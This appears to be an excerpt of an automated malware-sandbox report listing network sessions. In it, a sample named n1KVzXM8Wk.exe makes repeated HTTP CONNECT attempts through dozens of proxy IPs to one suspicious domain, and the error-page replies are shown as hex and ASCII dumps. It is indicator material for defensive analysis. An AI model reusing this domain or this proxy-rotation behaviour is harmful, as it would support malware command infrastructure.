                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 30 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 42 61 64 20 52 65 71 75 65 73 74 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 49 74 20 69 73 20 6e 6f 74 20 61 20 76 61 6c 69 64 20 72 65 71 75 65 73 74 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"><title> 400 Bad Request</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">400</h1><h2 style="margin-top:20px;font-size: 30px;">Bad Request</h2><p>It is not a valid request!</p></div></div></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1228192.168.2.45344394.247.241.70536406812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.878334999 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.443878889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.825408936 CET202INHTTP/1.0 404 Not Found
                                                                                                      Content-Length: 817
                                                                                                      Content-Type: text/html
                                                                                                      Date: Tue, 23 Jan 2024 09:52:14 GMT
                                                                                                      Expires: Tue, 23 Jan 2024 09:52:14 GMT
                                                                                                      Server: Mikrotik HttpProxy
                                                                                                      Proxy-Connection: close


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1229192.168.2.45271751.89.173.40447196812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.878464937 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.943942070 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1230192.168.2.45354147.179.5.810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.936636925 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1231192.168.2.453600172.67.182.78806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.936821938 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.025552988 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1232192.168.2.453606104.27.8.161806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.937484026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.025578022 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1233192.168.2.453616104.21.218.103806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.937947989 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.025648117 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1234192.168.2.452691194.8.232.4641536812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.938241959 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1235192.168.2.453621104.25.194.175806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.938596010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.026211023 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1236192.168.2.453551185.225.232.191806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.939053059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.109647036 CET830INHTTP/1.1 500 Internal Server Error
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Server: Apache/2.4.57 (Debian)
                                                                                                      Content-Length: 638
                                                                                                      Connection: close
                                                                                                      Content-Type: text/html; charset=iso-8859-1
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 5b 6e 6f 20 61 64 64 72 65 73 73 20 67 69 76 65 6e 5d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 68 65 79 67 69 72 6c 69 73 68 65 65 76 65 72 79 74 68 69 6e 67 79 6f 75 77 61 6e 74 65 64 69 6e 61 6d 61 6e 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                      Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at [no address given] to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Debian) Server at heygirlisheeverythingyouwantedinaman.com Port 443</address></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1237192.168.2.453625104.27.83.183806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.946806908 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.033770084 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1238192.168.2.453655185.238.228.240806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.956132889 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.043801069 CET316INHTTP/1.1 400 Bad Request
                                                                                                      Server: cloudflare
                                                                                                      Date: Fri, 23 Feb 2024 08:45:25 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 155
                                                                                                      Connection: close
                                                                                                      CF-RAY: -
                                                                                                      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                      Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1239192.168.2.453613172.93.111.87493976812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.957667112 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.443732023 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.834832907 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:27.556257010 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:29.147077084 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:32.046947956 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.858824015 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1240192.168.2.453211103.35.189.21731286812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.958558083 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975121975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.975276947 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.975205898 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1241192.168.2.45266192.246.139.113306356812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.970961094 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:28.975143909 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:31.975296974 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:37.975229025 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:49.990575075 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:01.990504026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:46:14.146785975 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1242192.168.2.453439116.107.182.4110806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.974668026 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1243192.168.2.45355020.206.106.19281236812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.981188059 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.193736076 CET319INHTTP/1.1 403 Forbidden
                                                                                                      Server: squid
                                                                                                      Mime-Version: 1.0
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                      Content-Length: 17
                                                                                                      X-Squid-Error: ERR_ACCESS_DENIED 0
                                                                                                      X-Cache: MISS from cdn-fintech.info
                                                                                                      X-Cache-Lookup: NONE from cdn-fintech.info:8123
                                                                                                      Connection: keep-alive
                                                                                                      Data Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44
                                                                                                      Data Ascii: ERR_ACCESS_DENIED


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1244192.168.2.45358145.138.87.23810806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.993415117 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1245192.168.2.453468154.85.58.149806812C:\Users\user\Desktop\n1KVzXM8Wk.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Feb 23, 2024 09:45:25.993468046 CET143OUTCONNECT heygirlisheeverythingyouwantedinaman.com:443 HTTP/1.1
                                                                                                      Host: heygirlisheeverythingyouwantedinaman.com
                                                                                                      Proxy-Connection: Keep-Alive
                                                                                                      Feb 23, 2024 09:45:26.300275087 CET321INHTTP/1.1 400 Bad Request
                                                                                                      Server: openresty/1.15.8.2
                                                                                                      Date: Fri, 23 Feb 2024 08:45:26 GMT
                                                                                                      Content-Type: text/html
                                                                                                      Content-Length: 163
                                                                                                      Connection: close
